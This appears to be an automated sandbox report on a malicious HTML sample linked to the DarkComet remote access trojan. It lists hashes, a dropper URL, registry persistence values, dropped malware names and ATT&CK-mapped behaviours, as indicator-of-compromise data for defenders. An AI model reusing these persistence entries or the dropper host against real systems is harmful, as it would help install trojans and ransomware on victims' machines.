darkcomet | d211f11c13e474b4e0868c62e95ce61ddd5e42b1ea8115d08c8f3f33308b12eb

Resubmissions

27-12-2024 18:03

241227-wnac4axnew 4

27-12-2024 18:00

241227-wlhaxsxndt 3

27-12-2024 17:44

241227-wa41jsxnas 10

Analysis

max time kernel
899s
max time network
901s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags

arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
submitted
27-12-2024 17:44

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

search.htm
Size

690KB
MD5

3a6ad6eba968f935a0f12f7dff76cb3a
SHA1

39803bc581a58d1c94657cb0ba57e905ccb5c735
SHA256

d211f11c13e474b4e0868c62e95ce61ddd5e42b1ea8115d08c8f3f33308b12eb
SHA512

ba822724d8f0576b74c5cc5cda660d8151d73425919793605369e65106bbeb34baccac9aa8118c6c3c7d37faac03728a91f35c0f76068ed79db2796830633444
SSDEEP

6144:ZtsQdSXd3OCXO807Vyu4r5Oi7usDpaezjkLdSHx3wnmPfsZoh0tN2INCgdGcaKXu:LSXd3v04FzXRNU82xp0

Score

10^/10

darkcomet defense_evasion discovery evasion execution persistence phishing ransomware rat trojan upx

Malware Config

Extracted

Language

hta

Source

URLs

hta.dropper

http://xenosploit.com/xeno.txt

Signatures

Darkcomet
DarkComet is a remote access trojan (RAT) developed by Jean-Pierre Lesueur.
trojan rat darkcomet
Darkcomet family
darkcomet

Modifies WinLogon for persistence 2 TTPs 8 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\UserInit = "C:\\Windows\\system32\\userinit.exe,C:\\Windows\\system32\\Windupdt\\winupdate.exe,C:\\Windows\\system32\\Windupdt\\winupdate.exe,C:\\Windows\\system32\\Windupdt\\winupdate.exe"	winupdate.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\UserInit = "C:\\Windows\\system32\\userinit.exe,C:\\Windows\\system32\\Windupdt\\winupdate.exe,C:\\Windows\\system32\\Windupdt\\winupdate.exe,C:\\Windows\\system32\\Windupdt\\winupdate.exe,C:\\Windows\\system32\\Windupdt\\winupdate.exe"	winupdate.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\UserInit = "C:\\Windows\\system32\\userinit.exe,C:\\Windows\\system32\\Windupdt\\winupdate.exe,C:\\Windows\\system32\\Windupdt\\winupdate.exe,C:\\Windows\\system32\\Windupdt\\winupdate.exe,C:\\Windows\\system32\\Windupdt\\winupdate.exe,C:\\Windows\\system32\\Windupdt\\winupdate.exe"	winupdate.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\UserInit = "C:\\Windows\\system32\\userinit.exe,C:\\Windows\\system32\\Windupdt\\winupdate.exe,C:\\Windows\\system32\\Windupdt\\winupdate.exe,C:\\Windows\\system32\\Windupdt\\winupdate.exe,C:\\Windows\\system32\\Windupdt\\winupdate.exe,C:\\Windows\\system32\\Windupdt\\winupdate.exe,C:\\Windows\\system32\\Windupdt\\winupdate.exe"	winupdate.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\UserInit = "C:\\Windows\\system32\\userinit.exe,C:\\Windows\\system32\\Windupdt\\winupdate.exe,C:\\Windows\\system32\\Windupdt\\winupdate.exe,C:\\Windows\\system32\\Windupdt\\winupdate.exe,C:\\Windows\\system32\\Windupdt\\winupdate.exe,C:\\Windows\\system32\\Windupdt\\winupdate.exe,C:\\Windows\\system32\\Windupdt\\winupdate.exe,C:\\Windows\\system32\\Windupdt\\winupdate.exe"	winupdate.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\UserInit = "C:\\Windows\\system32\\userinit.exe,C:\\Windows\\system32\\Windupdt\\winupdate.exe,C:\\Windows\\system32\\Windupdt\\winupdate.exe,C:\\Windows\\system32\\Windupdt\\winupdate.exe,C:\\Windows\\system32\\Windupdt\\winupdate.exe,C:\\Windows\\system32\\Windupdt\\winupdate.exe,C:\\Windows\\system32\\Windupdt\\winupdate.exe,C:\\Windows\\system32\\Windupdt\\winupdate.exe,C:\\Windows\\system32\\Windupdt\\winupdate.exe"	winupdate.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\UserInit = "C:\\Windows\\system32\\userinit.exe,C:\\Windows\\system32\\Windupdt\\winupdate.exe"	Blackkomet.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\UserInit = "C:\\Windows\\system32\\userinit.exe,C:\\Windows\\system32\\Windupdt\\winupdate.exe,C:\\Windows\\system32\\Windupdt\\winupdate.exe"	winupdate.exe

Blocklisted process makes network request 1 IoCs

flow	pid	Process
145	3636	mshta.exe

Disables Task Manager via registry modification
evasion
Downloads MZ/PE file

Sets file to hidden 1 TTPs 16 IoCs

Modifies file attributes to stop it showing in Explorer etc.

evasion

Hidden Files and Directories

T1564.001

pid	Process
3632	attrib.exe
3128	attrib.exe
1156	attrib.exe
932	attrib.exe
5896	attrib.exe
1912	attrib.exe
5600	attrib.exe
4084	attrib.exe
1612	attrib.exe
4940	attrib.exe
3796	attrib.exe
6060	attrib.exe
5220	attrib.exe
4548	attrib.exe
5340	attrib.exe
5380	attrib.exe

A potential corporate email address has been identified in the URL: [email protected]
phishing

Executes dropped EXE 32 IoCs

pid	Process
5376	WinNuke.98.exe
4296	WinNuke.98.exe
4276	Floxif.exe
3348	Floxif.exe
704	Blackkomet.exe
4536	winupdate.exe
4636	winupdate.exe
3148	winupdate.exe
4532	winupdate.exe
4108	XenoUI.exe
1844	winupdate.exe
5532	winupdate.exe
4300	winupdate.exe
3552	XenoUI.exe
3680	XenoUI.exe
1900	XenoUI.exe
2352	XenoUI.exe
6544	Furk Ultra.exe
6636	Furk Ultra.exe
6676	Furk Ultra.exe
6736	Furk Ultra.exe
6172	Furk Ultra.exe
6084	Furk Ultra.exe
6508	WinNuke.98.exe
3936	Furk Ultra.exe
5100	WinNuke.98.exe
7084	ArcticBomb.exe
7272	ArcticBomb.exe
7660	$uckyLocker.exe
7236	$uckyLocker.exe
8056	AgentTesla.exe
6268	AgentTesla.exe

Loads dropped DLL 13 IoCs

pid	Process
4276	Floxif.exe
3348	Floxif.exe
6544	Furk Ultra.exe
6636	Furk Ultra.exe
6676	Furk Ultra.exe
6736	Furk Ultra.exe
6636	Furk Ultra.exe
6636	Furk Ultra.exe
6636	Furk Ultra.exe
6636	Furk Ultra.exe
6172	Furk Ultra.exe
3936	Furk Ultra.exe
3936	Furk Ultra.exe

Adds Run key to start application 2 TTPs 9 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000\Software\Microsoft\Windows\CurrentVersion\Run\winupdater = "C:\\Windows\\system32\\Windupdt\\winupdate.exe"	winupdate.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000\Software\Microsoft\Windows\CurrentVersion\Run\winupdater = "C:\\Windows\\system32\\Windupdt\\winupdate.exe"	winupdate.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000\Software\Microsoft\Windows\CurrentVersion\Run\winupdater = "C:\\Windows\\system32\\Windupdt\\winupdate.exe"	winupdate.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000\Software\Microsoft\Windows\CurrentVersion\Run\winupdater = "C:\\Windows\\system32\\Windupdt\\winupdate.exe"	winupdate.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000\Software\Microsoft\Windows\CurrentVersion\Run\winupdater = "C:\\Windows\\system32\\Windupdt\\winupdate.exe"	winupdate.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000\Software\Microsoft\Windows\CurrentVersion\Run\Furk Ultra = "C:\\Users\\Admin\\AppData\\Roaming\\Furk Ultra\\Furk Ultra.exe"	Furk Ultra.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000\Software\Microsoft\Windows\CurrentVersion\Run\winupdater = "C:\\Windows\\system32\\Windupdt\\winupdate.exe"	Blackkomet.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000\Software\Microsoft\Windows\CurrentVersion\Run\winupdater = "C:\\Windows\\system32\\Windupdt\\winupdate.exe"	winupdate.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000\Software\Microsoft\Windows\CurrentVersion\Run\winupdater = "C:\\Windows\\system32\\Windupdt\\winupdate.exe"	winupdate.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1928	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 9 IoCs

Web Service

T1102

flow	ioc
51	raw.githubusercontent.com
146	raw.githubusercontent.com
151	raw.githubusercontent.com
396	raw.githubusercontent.com
29	raw.githubusercontent.com
46	raw.githubusercontent.com
153	raw.githubusercontent.com
150	raw.githubusercontent.com
152	raw.githubusercontent.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
198	api.ipify.org
214	api.ipify.org

Drops file in System32 directory 40 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\Windupdt\	winupdate.exe
File created	C:\Windows\SysWOW64\Windupdt\winupdate.exe	winupdate.exe
File created	C:\Windows\SysWOW64\Windupdt\winupdate.exe	winupdate.exe
File created	C:\Windows\SysWOW64\Windupdt\winupdate.exe	winupdate.exe
File opened for modification	C:\Windows\SysWOW64\Windupdt\winupdate.exe	winupdate.exe
File opened for modification	C:\Windows\SysWOW64\Windupdt\winupdate.exe	winupdate.exe
File opened for modification	C:\Windows\SysWOW64\Windupdt	attrib.exe
File opened for modification	C:\Windows\SysWOW64\Windupdt\	winupdate.exe
File opened for modification	C:\Windows\SysWOW64\Windupdt\	winupdate.exe
File created	C:\Windows\SysWOW64\Windupdt\winupdate.exe	Blackkomet.exe
File opened for modification	C:\Windows\SysWOW64\Windupdt	attrib.exe
File opened for modification	C:\Windows\SysWOW64\Windupdt\winupdate.exe	attrib.exe
File opened for modification	C:\Windows\SysWOW64\Windupdt	attrib.exe
File created	C:\Windows\SysWOW64\Windupdt\winupdate.exe:Zone.Identifier:$DATA	Blackkomet.exe
File opened for modification	C:\Windows\SysWOW64\Windupdt\winupdate.exe	winupdate.exe
File opened for modification	C:\Windows\SysWOW64\Windupdt	attrib.exe
File opened for modification	C:\Windows\SysWOW64\Windupdt\	winupdate.exe
File opened for modification	C:\Windows\SysWOW64\Windupdt\winupdate.exe	winupdate.exe
File created	C:\Windows\SysWOW64\Windupdt\winupdate.exe:SmartScreen:$DATA	Blackkomet.exe
File created	C:\Windows\SysWOW64\Windupdt\winupdate.exe	winupdate.exe
File created	C:\Windows\SysWOW64\Windupdt\winupdate.exe	winupdate.exe
File created	C:\Windows\SysWOW64\Windupdt\winupdate.exe	winupdate.exe
File opened for modification	C:\Windows\SysWOW64\Windupdt	attrib.exe
File opened for modification	C:\Windows\SysWOW64\Windupdt\winupdate.exe	winupdate.exe
File opened for modification	C:\Windows\SysWOW64\Windupdt\winupdate.exe	Blackkomet.exe
File opened for modification	C:\Windows\SysWOW64\Windupdt\	Blackkomet.exe
File opened for modification	C:\Windows\SysWOW64\Windupdt\winupdate.exe	attrib.exe
File opened for modification	C:\Windows\SysWOW64\Windupdt\winupdate.exe	attrib.exe
File opened for modification	C:\Windows\SysWOW64\Windupdt	attrib.exe
File opened for modification	C:\Windows\SysWOW64\Windupdt\	winupdate.exe
File opened for modification	C:\Windows\SysWOW64\Windupdt\winupdate.exe	attrib.exe
File created	C:\Windows\SysWOW64\Windupdt\winupdate.exe	winupdate.exe
File opened for modification	C:\Windows\SysWOW64\Windupdt\	winupdate.exe
File opened for modification	C:\Windows\SysWOW64\Windupdt\winupdate.exe	winupdate.exe
File opened for modification	C:\Windows\SysWOW64\Windupdt\	winupdate.exe
File opened for modification	C:\Windows\SysWOW64\Windupdt\winupdate.exe	attrib.exe
File opened for modification	C:\Windows\SysWOW64\Windupdt\winupdate.exe	attrib.exe
File opened for modification	C:\Windows\SysWOW64\Windupdt\winupdate.exe	winupdate.exe
File opened for modification	C:\Windows\SysWOW64\Windupdt\winupdate.exe	attrib.exe
File opened for modification	C:\Windows\SysWOW64\Windupdt	attrib.exe

Sets desktop wallpaper using registry 2 TTPs 2 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000\Control Panel\Desktop\Wallpaper = "0"	$uckyLocker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000\Control Panel\Desktop\Wallpaper = "0"	$uckyLocker.exe

UPX packed file 9 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/4276-1697-0x0000000010000000-0x0000000010030000-memory.dmp	upx
behavioral1/memory/4276-1700-0x0000000010000000-0x0000000010030000-memory.dmp	upx
behavioral1/memory/3348-1710-0x0000000010000000-0x0000000010030000-memory.dmp	upx
behavioral1/memory/3348-1721-0x0000000010000000-0x0000000010030000-memory.dmp	upx
behavioral1/files/0x002300000002aecb-5115.dat	upx
behavioral1/memory/7084-5127-0x0000000000400000-0x0000000000454000-memory.dmp	upx
behavioral1/memory/7084-5129-0x0000000000400000-0x0000000000454000-memory.dmp	upx
behavioral1/memory/7272-5167-0x0000000000400000-0x0000000000454000-memory.dmp	upx
behavioral1/memory/7272-5169-0x0000000000400000-0x0000000000454000-memory.dmp	upx

Drops file in Program Files directory 21 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\Briano\UWPHook\MaterialDesignColors.dll	AgentTesla.exe
File opened for modification	C:\Program Files (x86)\Briano\UWPHook\System.Management.Automation.dll	AgentTesla.exe
File opened for modification	C:\Program Files (x86)\Briano\UWPHook\UWPHook.exe	AgentTesla.exe
File opened for modification	C:\Program Files (x86)\Briano\UWPHook\MaterialDesignThemes.Wpf.dll	AgentTesla.exe
File created	C:\Program Files (x86)\Briano\UWPHook\MaterialDesignColors.dll	AgentTesla.exe
File created	C:\Program Files (x86)\Briano\UWPHook\MaterialDesignThemes.Wpf.dll	AgentTesla.exe
File created	C:\Program Files (x86)\Briano\UWPHook\MaterialDesignThemes.Wpf.xml	AgentTesla.exe
File created	C:\Program Files (x86)\Briano\UWPHook\Microsoft.Management.Infrastructure.dll	AgentTesla.exe
File created	C:\Program Files (x86)\Briano\UWPHook\SharpSteam.dll	AgentTesla.exe
File created	C:\Program Files (x86)\Briano\UWPHook\UWPHook.exe	AgentTesla.exe
File created	C:\Program Files (x86)\Briano\UWPHook\VDFParser.dll	AgentTesla.exe
File opened for modification	C:\Program Files (x86)\Briano\UWPHook\SharpSteam.dll	AgentTesla.exe
File opened for modification	C:\Program Files (x86)\Briano\UWPHook\System.Management.Automation.xml	AgentTesla.exe
File created	C:\Program Files (x86)\Briano\UWPHook\System.Management.Automation.dll	AgentTesla.exe
File created	C:\Program Files (x86)\Briano\UWPHook\System.Management.Automation.xml	AgentTesla.exe
File opened for modification	C:\Program Files (x86)\Briano\UWPHook\Microsoft.Management.Infrastructure.dll	AgentTesla.exe
File opened for modification	C:\Program Files (x86)\Briano\UWPHook\VDFParser.dll	AgentTesla.exe
File created	C:\Program Files\Common Files\System\symsrv.dll	Floxif.exe
File created	C:\Program Files (x86)\Briano\UWPHook\UWPHook.exe.config	AgentTesla.exe
File opened for modification	C:\Program Files (x86)\Briano\UWPHook\MaterialDesignThemes.Wpf.xml	AgentTesla.exe
File opened for modification	C:\Program Files (x86)\Briano\UWPHook\UWPHook.exe.config	AgentTesla.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SystemTemp	chrome.exe

Subvert Trust Controls: Mark-of-the-Web Bypass 1 TTPs 6 IoCs

When files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named Zone.Identifier with a specific value known as the MOTW.

defense_evasion

SIP and Trust Provider Hijacking

T1553.003

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\$uckyLocker.exe:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\AgentTesla.exe:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\WinNuke.98.exe:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Floxif.exe:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Blackkomet.exe:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\ArcticBomb.exe:Zone.Identifier	msedge.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 2 IoCs

pid	pid_target	Process	procid_target
2036	4276	WerFault.exe	153
2832	3348	WerFault.exe	157

System Location Discovery: System Language Discovery 1 TTPs 33 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	$uckyLocker.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	winupdate.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	winupdate.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AgentTesla.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	winupdate.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Furk Ultra.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AgentTesla.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	winupdate.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ArcticBomb.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Floxif.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Blackkomet.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	winupdate.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WinNuke.98.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Floxif.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	winupdate.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	$uckyLocker.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	winupdate.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe

Checks processor information in registry 2 TTPs 38 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe

Enumerates system info in registry 2 TTPs 9 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
3156	taskkill.exe

Modifies registry class 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg	OpenWith.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	OpenWith.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	winupdate.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 19002f433a5c000000000000000000000000000000000000000000	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0	OpenWith.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1	OpenWith.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\NodeSlot = "1"	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	OpenWith.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	OpenWith.exe
